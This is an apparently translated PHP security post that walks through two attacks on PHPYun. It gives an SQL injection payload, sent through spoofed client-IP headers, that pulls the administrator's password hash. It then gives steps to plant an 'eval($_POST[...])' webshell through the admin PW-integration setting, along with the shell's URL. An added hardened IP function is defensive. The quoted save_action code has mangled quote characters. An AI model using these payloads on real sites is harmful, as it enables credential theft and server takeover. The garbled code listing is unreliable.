Source: 自学PHP网 Date: 2015-04-17 12:00
/model/class/action.class.php, line 603
function fun_ip_get() {
    // HTTP_CLIENT_IP and HTTP_X_FORWARDED_FOR are taken from request headers and
    // are checked before REMOTE_ADDR; the value is returned without validation.
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) {
        $ip = getenv("HTTP_CLIENT_IP");
    } else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) {
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    } else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) {
        $ip = getenv("REMOTE_ADDR");
    } else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) {
        $ip = $_SERVER['REMOTE_ADDR'];
    } else {
        $ip = "unknown";
    }
    return ($ip);
}
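Exploit: register a personal member account, then spoof the IP when logging in. The id can be obtained by capturing the first login request. After logging in, the email field shows the administrator's 32-character MD5 hash.
127.1',`email`=(select password from phpyun_admin_user where username='admin') where `uid`=1#
The uid can be obtained by capturing the login request.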
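A hardened counterpart to fun_ip_get(), added here as an example and not taken from PHPYun's code: it ignores forwarding headers unless the direct peer is a known proxy, validates every candidate with filter_var, and stores the result through a bound parameter. The function names, the proxy list, and the table and column in the UPDATE are assumptions.

```php
<?php
// Added example; function names, proxy list and schema are assumptions.
const TRUSTED_PROXIES = ['10.0.0.5'];   // reverse proxies allowed to set X-Forwarded-For

function client_ip(array $server): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
        return '0.0.0.0';               // never hand raw header text to callers
    }
    // Forwarding headers are client-controlled unless the peer is our own proxy.
    if (in_array($remote, TRUSTED_PROXIES, true) && !empty($server['HTTP_X_FORWARDED_FOR'])) {
        // Walk right to left: the rightmost entries were appended by our proxies.
        $hops = array_reverse(array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR'])));
        foreach ($hops as $hop) {
            if (filter_var($hop, FILTER_VALIDATE_IP) === false) {
                break;                  // malformed entry: fall back to the peer address
            }
            if (!in_array($hop, TRUSTED_PROXIES, true)) {
                return $hop;
            }
        }
    }
    return $remote;
}

// Bind the value so it can never change the shape of the UPDATE statement.
function record_login_ip(PDO $db, int $uid, string $ip): void
{
    // Table and column names are placeholders, not PHPYun's real schema.
    $stmt = $db->prepare('UPDATE member SET login_ip = :ip WHERE uid = :uid');
    $stmt->execute([':ip' => $ip, ':uid' => $uid]);
}

// Constructed requests. In $spoofed the peer is not a trusted proxy, so both headers are ignored.
$spoofed = [
    'REMOTE_ADDR'          => '203.0.113.7',
    'HTTP_CLIENT_IP'       => "127.1',`email`=(select 1) where `uid`=1#",
    'HTTP_X_FORWARDED_FOR' => "127.1',`email`=(select 1) where `uid`=1#",
];
$proxied = [
    'REMOTE_ADDR'          => '10.0.0.5',
    'HTTP_X_FORWARDED_FOR' => '198.51.100.9',
];
echo client_ip($spoofed), PHP_EOL;
echo client_ip($proxied), PHP_EOL;
```

HTTP_CLIENT_IP is never consulted, because no standard proxy behaviour guarantees it.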
Getshell from the admin backend
function save_action()
{
extract($_POST); // imports every POST field as a local variable, including $uc_config
$config = "<?php ";
$uc_config = str_replace(“′”,”‘”,$uc_config);
$uc_config = str_replace(“”",”"”,$uc_config);
$uc_config = str_replace(“\’”,”"”,$uc_config);
$uc_config = str_replace(“\‘”,”"”,$uc_config);
$uc_config = str_replace(“\’”,”"”,$uc_config);
$uc_config = str_replace(“’”,”"”,$uc_config);
$uc_config = str_replace(“‘”,”"”,$uc_config);
$uc_config = str_replace(“\”",”"”,$uc_config);
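$config .= $uc_config; // the submitted value becomes the body of a PHP file
$path = APP_PATH."/api/pw_api/pw_config.php";
$fp = @fopen($path,"w");
fwrite($fp,$config);
fclose($fp);
It filters quite a lot, but none of that gets in our way.
Go to the admin backend -> Site Tools -> PW integration.
Append at the very end:
eval ($_POST[DisKill]) ;
Enable PW.
One-line webshell URL: http://www.2cto.com /api/pw_api/pw_config.php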